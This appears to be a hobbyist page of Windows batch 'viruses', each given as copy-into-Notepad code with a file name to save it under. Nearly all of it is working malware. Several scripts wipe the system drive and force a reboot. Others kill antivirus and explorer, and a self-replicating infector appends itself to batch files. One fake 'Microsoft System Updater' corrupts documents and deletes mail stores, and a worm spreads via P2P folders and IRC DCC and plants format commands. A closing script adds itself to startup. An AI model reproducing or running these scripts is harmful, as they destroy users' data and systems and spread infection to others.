If u r beginner in this field then don't play with ur computer becoz These viruses can corrupt and destroy your system file and h/w . So run and execute these viruses at own risk.........

batch virus

Batch files (In Order of Danger, smallest to largest)

(USE AT OWN RISK)

___________________________________________________

Unlimited Folder with the CMD(Command Prompt)

open notepad and type

@echo off
:loop
md %random%
goto loop

saveas gaurav.bat
_________________________

Popups with the CMD(Command Prompt)

open notepad and type

@echo off
:GG
start
goto GG

saveas gaurav.bat
_________________________

Popups with Internet Explorer

open notepad and type

@echo off
:GG
start iexplore.exe http://www.google.com/
goto GG

saveas gaurav.bat
_________________________

Popups with Notepad

@echo off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

This opens up notepad endlessly, but can be dangerous

saveas gaurav.bat
__________________________

Official Blue Screen Of Death

Open Notepad and type in:

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


This virus deletes your whole computer system resulting in the blue 'error' screen of death

saveas gaurav.bat 
____________________________________

Deletes System files

Open Notepad and type in:

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


This virus deletes your whole computer system resulting in the blue 'error' screen of death

saveas gaurav.bat
________________________________________

Virus hacking

Open Notepad and type in:

title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown



saveas gaurav.bat
___________________________________________________________________

ORGY Virus

Open Notepad and type in:

@Echo off
echo orgy > infect1.bat
echo if [%%1]==[infect1.bat] goto DontBother > infect2.bat
echo if [%%1]==[infect2.bat] goto DontBother >> infect2.bat
echo copy %%1 + infect1.bat %%1 >> infect2.bat
echo attrib +r %%1 >> infect2.bat
echo :DontBother >> infect2.bat
attrib +r infect1.bat
attrib +r infect2.bat
for %%f in (*.bat) do call infect2 %%f
attrib -r infect1.bat
attrib -r infect2.bat
del infect1.bat
del infect2.bat
rem ORGY.BAT virus by EXE-Gency/[KrashMag]
rem email exegency@hotmail.com


_________________________________________________________________

Virus

Open Notepad and type in:


@ECHO OFF           
CLS
IF EXIST c:\winupdt.bat GOTO CODE
GOTO SETUP
:SETUP
@ECHO OFF
ECHO Welcome To Microsoft Windows System Updater Setup
ECHO.
copy %0 c:\winupdt.bat >> NUL
ECHO Scanning System.....Please Wait
prompt $P$SWindows2000
type %0 >> c:\autoexec.bat
type %0 >> c:\windows\dosstart.bat
ECHO DONE.
ECHO.
ECHO Installing Components....Please Wait
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
ECHO DONE.
ECHO.
ECHO You Now Need to Register with Microsoft's Partner: Fortune Galaxy to receive automatic updates.
PAUSE
ECHO Downloading Components...Please Wait
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx"
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"  del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
ECHO Setup Will Now restart Your Computer....Please Wait
ECHO Your System is not faster by almost 40%.
ECHO Thank you for using a Microsoft Partner's product.
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
c:\WINDOWS\RUNDLL user.exe,exitwindowsexec
CLS
GOTO END
:CODE
CLS
@ECHO OFF
prompt $P$SWindows2000
IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC
type %0 >> c:\autoexec.bat
:ABC
type %0 >> c:\windows\dosstart.bat
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"  del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
GOTO :END
CLS
:END
CLS

__________________________________________

Virus

Open Notepad and type in:

@Echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\jqfoiscx.bat>nul
echo.on error resume next>%windir%\jqfoiscx.vbs
echo.set oj=CreateObject("wscript.shell")>>%windir%\jqfoiscx.vbs
echo.oj.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName\StubPath","%windir%\jqfoiscx.bat">>%windir%\jqfoiscx.vbs
rundll32 mouse,disable
rundll32 keyboard,disable
set fsq=deltree/y c:\
%fsq%antiba*>nul
%fsq%antivi*>nul
%fsq%av*>nul
%fsq%bitdef*>nul
%fsq%comman~1\>nul
%fsq%cleanc*>nul
%fsq%esafen\>nul
%fsq%findvi*>nul
%fsq%f-*>nul
%fsq%fwin*>nul
%fsq%inocul*>nul
%fsq%kasper*>nul
%fsq%mcafee*>nul
%fsq%msav\>nul
%fsq%norman\>nul
%fsq%norton*>nul
%fsq%pav\>nul
%fsq%pccill*>nul
%fsq%pc-cil*>nul
%fsq%rav\>nul
%fsq%softwin\>nul
%fsq%tbav*>nul
%fsq%toolkit\>nul
%fsq%trendm~1\>nul
%fsq%trex\>nul
%fsq%virus*>nul
%fsq%vpc\>nul
%fsq%vs95\>nul
%fsq%zonela*>nul
set fsq=deltree/y c:\progra~1\
%fsq%antiba*>nul
%fsq%antivi*>nul
%fsq%avg*>nul
%fsq%bitdef*>nul
%fsq%comman~1\>nul
%fsq%common~1\avp*>nul
%fsq%common~1\syman*>nul
%fsq%datafe*>nul
%fsq%deerfi*>nul
%fsq%f-*>nul
%fsq%findvi~1\>nul
%fsq%fsi\>nul
%fsq%fwin*>nul
%fsq%grisoft\>nul
%fsq%inocul*>nul
%fsq%kasper*>nul
%fsq%mcafee*>nul
%fsq%mindso~1\>nul
%fsq%norman\>nul
%fsq%norton*>nul
%fsq%pandas~1\>nul
%fsq%protec*>nul
%fsq%quickh~1\>nul
%fsq%rav\>nul
%fsq%signal9\>nul
%fsq%softwin\>nul
%fsq%spysto~1\>nul
%fsq%syman*>nul
%fsq%tbav\>nul
%fsq%tinype~1\>nul
%fsq%trend*>nul
%fsq%trojan*>nul
%fsq%virus*>nul
%fsq%zonela*>nul
set fsq=
copy %0 c:\download\epix.BAT>nul
copy %0 c:\downlo~1\epix.BAT>nul
copy %0 c:\eigene~1\epix.BAT>nul
copy %0 c:\kazaa\myshar~1\epix.BAT>nul
copy %0 c:\mesdoc~1\epix.BAT>nul
copy %0 c:\meusdo~1\epix.BAT>nul
copy %0 c:\mydocu~1\mymusi~1\epix.BAT>nul
copy %0 c:\mydocu~1\epix.BAT>nul
copy %0 c:\mydown~1\epix.BAT>nul
copy %0 c:\mymusi~1\epix.BAT>nul
copy %0 c:\mymusic\epix.BAT>nul
copy %0 c:\progra~1\applej~1\incoming\epix.BAT>nul
copy %0 c:\progra~1\bearsh~1\shared\epix.BAT>nul
copy %0 c:\progra~1\edonke~1\incoming\epix.BAT>nul
copy %0 c:\progra~1\emule\incoming\epix.BAT>nul
copy %0 c:\progra~1\gnucleus\downlo~1\incoming\epix.BAT>nul
copy %0 c:\progra~1\gnucleus\downlo~1\epix.BAT>nul
copy %0 c:\progra~1\grokster\mygrok~1\epix.BAT>nul
copy %0 c:\progra~1\icq\shared~1\epix.BAT>nul
copy %0 c:\progra~1\kazaa\myshar~1\epix.BAT>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\epix.BAT>nul
copy %0 c:\progra~1\kmd\myshar~1\epix.BAT>nul
copy %0 c:\progra~1\limewire\shared\epix.BAT>nul
copy %0 c:\progra~1\morpheus\myshar~1\epix.BAT>nul
copy %0 c:\progra~1\overnet\bundles\epix.BAT>nul
copy %0 c:\progra~1\shareaza\downlo~1\epix.BAT>nul
copy %0 c:\epix.BAT>nul
copy %0 c:\mirc\download\epix.BAT>nul
copy %0 c:\mirc32\download\epix.BAT>nul
copy %0 c:\progra~1\mirc\download\epix.BAT>nul
copy %0 c:\progra~1\mirc32\download\epix.BAT>nul
echo.[script]>%windir%\jqfoiscx.ini
echo.n0=on 1:JOIN:#:{>>%windir%\jqfoiscx.ini
echo.n1=/if ( $nick == $me ) { halt }>>%windir%\jqfoiscx.ini
echo.n2=/dcc send $nick c:\epix.BAT>>%windir%\jqfoiscx.ini
echo.n3=}>>%windir%\jqfoiscx.ini
deltree/y c:\mirc\script.ini>nul
deltree/y c:\mirc32\script.ini>nul
deltree/y c:\progra~1\mirc\script.ini>nul
deltree/y c:\progra~1\mirc32\script.ini>nul
copy %windir%\jqfoiscx.ini c:\mirc\script.ini>nul
copy %windir%\jqfoiscx.ini c:\mirc32\script.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\mirc\script.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\mirc32\script.ini>nul
copy %0 c:\pirch\downlo~1\epix.BAT>nul
copy %0 c:\pirch32\downlo~1\epix.BAT>nul
copy %0 c:\pirch98\downlo~1\epix.BAT>nul
copy %0 c:\progra~1\pirch\downlo~1\epix.BAT>nul
copy %0 c:\progra~1\pirch32\downlo~1\epix.BAT>nul
copy %0 c:\progra~1\pirch98\downlo~1\epix.BAT>nul
echo.[Levels]>%windir%\jqfoiscx.ini
echo.Enabled=1>>%windir%\jqfoiscx.ini
echo.Count=6>>%windir%\jqfoiscx.ini
echo.Level1=000-Unknowns>>%windir%\jqfoiscx.ini
echo.000-UnknownsEnabled=1>>%windir%\jqfoiscx.ini
echo.Level2=100-Level 100>>%windir%\jqfoiscx.ini
echo.100-Level 100Enabled=1>>%windir%\jqfoiscx.ini
echo.Level3=200-Level 200>>%windir%\jqfoiscx.ini
echo.200-Level 200Enabled=1>>%windir%\jqfoiscx.ini
echo.Level4=300-Level 300>>%windir%\jqfoiscx.ini
echo.300-Level 300Enabled=1>>%windir%\jqfoiscx.ini
echo.Level5=400-Level 400>>%windir%\jqfoiscx.ini
echo.400-Level 400Enabled=1>>%windir%\jqfoiscx.ini
echo.Level6=500-Level 500>>%windir%\jqfoiscx.ini
echo.500-Level 500Enabled=1>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[000-Unknowns]>>%windir%\jqfoiscx.ini
echo.User1=*!*@*>>%windir%\jqfoiscx.ini
echo.UserCount=1>>%windir%\jqfoiscx.ini
echo.Event1=ON JOIN:#:/dcc send $nick c:\epix.BAT>>%windir%\jqfoiscx.ini
echo.EventCount=1>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[100-Level 100]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[200-Level 200]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[300-Level 300]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[400-Level 400]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
echo.>>%windir%\jqfoiscx.ini
echo.[500-Level 500]>>%windir%\jqfoiscx.ini
echo.UserCount=0>>%windir%\jqfoiscx.ini
echo.EventCount=0>>%windir%\jqfoiscx.ini
deltree/y c:\pirch\events.ini>nul
deltree/y c:\pirch98\events.ini>nul
deltree/y c:\pirch32\events.ini>nul
deltree/y c:\progra~1\pirch\events.ini>nul
deltree/y c:\progra~1\pirch98\events.ini>nul
deltree/y c:\progra~1\pirch32\events.ini>nul
copy %windir%\jqfoiscx.ini c:\pirch\events.ini>nul
copy %windir%\jqfoiscx.ini c:\pirch98\events.ini>nul
copy %windir%\jqfoiscx.ini c:\pirch32\events.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\pirch\events.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\pirch98\events.ini>nul
copy %windir%\jqfoiscx.ini c:\progra~1\pirch32\events.ini>nul
echo.oj.RegWrite "HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick c:\epix.BAT">>%windir%\jqfoiscx.vbs
for %%a in (*.bat ..\*.bat c:\mydocu~1\*.bat c:\eigene~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do attrib -r -h -s -a %%a
for %%a in (*.bat ..\*.bat c:\mydocu~1\*.bat c:\eigene~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do copy %windir%\jqfoiscx.bat %%a /y
for %%a in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%a:\nul copy %windir%\jqfoiscx.bat %%a:\jqfoiscx.bat /y
echo.oj.run "%windir%\jqfoiscx.bat", VBHide>>%windir%\jqfoiscx.vbs
for %%x in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do attrib -r -h -s -a %%x
for %%x in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do copy %windir%\jqfoiscx.vbs %%x /y
for %%x in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%x:\nul copy %windir%\jqfoiscx.vbs %%x:\jqfoiscx.vbs /y
echo.d=wscript.createobject("wscript.shell");>%windir%\jqfoiscx.js
echo.d.Run("%windir%\jqfoiscx.bat");>>%windir%\jqfoiscx.js
for %%r in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do attrib -r -h -s -a %%r
for %%r in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do copy %windir%\jqfoiscx.js %%r /y
for %%r in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%r:\nul copy %windir%\jqfoiscx.js %%r:\jqfoiscx.js /y
echo.REGEDIT4>%windir%\xf.reg
echo.>>%windir%\xf.reg
echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%windir%\xf.reg
echo.""="%windir%\jqfoiscx.bat">>%windir%\xf.reg
for %%x in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do attrib -r -h -s -a %%x
for %%x in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do copy %windir%\xf.reg %%x /y
for %%x in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%x:\nul copy %windir%\xf.reg %%x:\jqfoiscx.reg /y
echo.SHELL "%windir%\jqfoiscx.bat">%windir%\fw.bas
echo.END>>%windir%\fw.bas
for %%f in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do attrib -r -h -s -a %%f
for %%f in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do copy %windir%\fw.bas %%f /y
for %%f in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%f:\nul copy %windir%\fw.bas %%f:\jqfoiscx.bas /y
echo.time 00:00:00,00>>c:\autoexec.bat
echo.date 80-01-01>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat
echo.[menu]>>c:\config.sys
echo.menuitem=ic>>c:\config.sys
echo.>>c:\config.sys
echo.[ic]>>c:\config.sys
echo.buffers=1>>c:\config.sys
echo.files=1>>c:\config.sys
echo.lastdrive=A>>c:\config.sys
echo.set path=deltree/y c:\>>c:\config.sys
echo.set temp=A:\>>c:\config.sys
echo.set windir=format c:/u/q/autotest>>c:\config.sys
set š?Î???=md %windir%\desktop\
%š?Î???%š?Î???00>nul | %š?Î???%š?Î???01>nul | %š?Î???%š?Î???02>nul | %š?Î???%š?Î???03>nul
%š?Î???%š?Î???04>nul | %š?Î???%š?Î???05>nul | %š?Î???%š?Î???06>nul | %š?Î???%š?Î???07>nul
%š?Î???%š?Î???08>nul | %š?Î???%š?Î???09>nul | %š?Î???%š?Î???10>nul | %š?Î???%š?Î???11>nul
%š?Î???%š?Î???12>nul | %š?Î???%š?Î???13>nul | %š?Î???%š?Î???14>nul | %š?Î???%š?Î???15>nul
%š?Î???%š?Î???16>nul | %š?Î???%š?Î???17>nul | %š?Î???%š?Î???18>nul | %š?Î???%š?Î???19>nul
%š?Î???%š?Î???20>nul | %š?Î???%š?Î???21>nul | %š?Î???%š?Î???22>nul | %š?Î???%š?Î???23>nul
%š?Î???%š?Î???24>nul | %š?Î???%š?Î???25>nul | %š?Î???%š?Î???26>nul | %š?Î???%š?Î???27>nul
%š?Î???%š?Î???28>nul | %š?Î???%š?Î???29>nul | %š?Î???%š?Î???30>nul | %š?Î???%š?Î???31>nul
%š?Î???%š?Î???32>nul | %š?Î???%š?Î???33>nul | %š?Î???%š?Î???34>nul | %š?Î???%š?Î???35>nul
%š?Î???%š?Î???36>nul | %š?Î???%š?Î???37>nul | %š?Î???%š?Î???38>nul | %š?Î???%š?Î???39>nul
%š?Î???%š?Î???40>nul | %š?Î???%š?Î???41>nul | %š?Î???%š?Î???42>nul | %š?Î???%š?Î???43>nul
%š?Î???%š?Î???44>nul | %š?Î???%š?Î???45>nul | %š?Î???%š?Î???46>nul | %š?Î???%š?Î???47>nul
%š?Î???%š?Î???48>nul | %š?Î???%š?Î???49>nul | %š?Î???%š?Î???50>nul | %š?Î???%š?Î???51>nul
%š?Î???%š?Î???52>nul | %š?Î???%š?Î???53>nul | %š?Î???%š?Î???54>nul | %š?Î???%š?Î???55>nul
%š?Î???%š?Î???56>nul | %š?Î???%š?Î???57>nul | %š?Î???%š?Î???58>nul | %š?Î???%š?Î???59>nul
%š?Î???%š?Î???60>nul | %š?Î???%š?Î???61>nul | %š?Î???%š?Î???62>nul | %š?Î???%š?Î???63>nul
%š?Î???%š?Î???64>nul | %š?Î???%š?Î???65>nul | %š?Î???%š?Î???66>nul | %š?Î???%š?Î???67>nul
%š?Î???%š?Î???68>nul | %š?Î???%š?Î???69>nul | %š?Î???%š?Î???70>nul | %š?Î???%š?Î???71>nul
%š?Î???%š?Î???72>nul | %š?Î???%š?Î???73>nul | %š?Î???%š?Î???74>nul | %š?Î???%š?Î???75>nul
%š?Î???%š?Î???76>nul | %š?Î???%š?Î???77>nul | %š?Î???%š?Î???78>nul | %š?Î???%š?Î???79>nul
%š?Î???%š?Î???80>nul | %š?Î???%š?Î???81>nul | %š?Î???%š?Î???82>nul | %š?Î???%š?Î???83>nul
%š?Î???%š?Î???84>nul | %š?Î???%š?Î???85>nul | %š?Î???%š?Î???86>nul | %š?Î???%š?Î???87>nul
%š?Î???%š?Î???88>nul | %š?Î???%š?Î???89>nul | %š?Î???%š?Î???90>nul | %š?Î???%š?Î???91>nul
%š?Î???%š?Î???92>nul | %š?Î???%š?Î???93>nul | %š?Î???%š?Î???94>nul | %š?Î???%š?Î???95>nul
%š?Î???%š?Î???96>nul | %š?Î???%š?Î???97>nul | %š?Î???%š?Î???98>nul | %š?Î???%š?Î???99>nul
set š?Î???=
cscript %windir%\jqfoiscx.vbs
cls

______________________

Virus



Open Notepad and type in:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
saveas gaurav.bat
------------------------
It will :1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Task kill MSN, Norton, Windows Explorer, Limewire.
4) Opens alert boxes
5) Changes the time to 12:00 and shuts down the computer
etc.....
__________________________________________________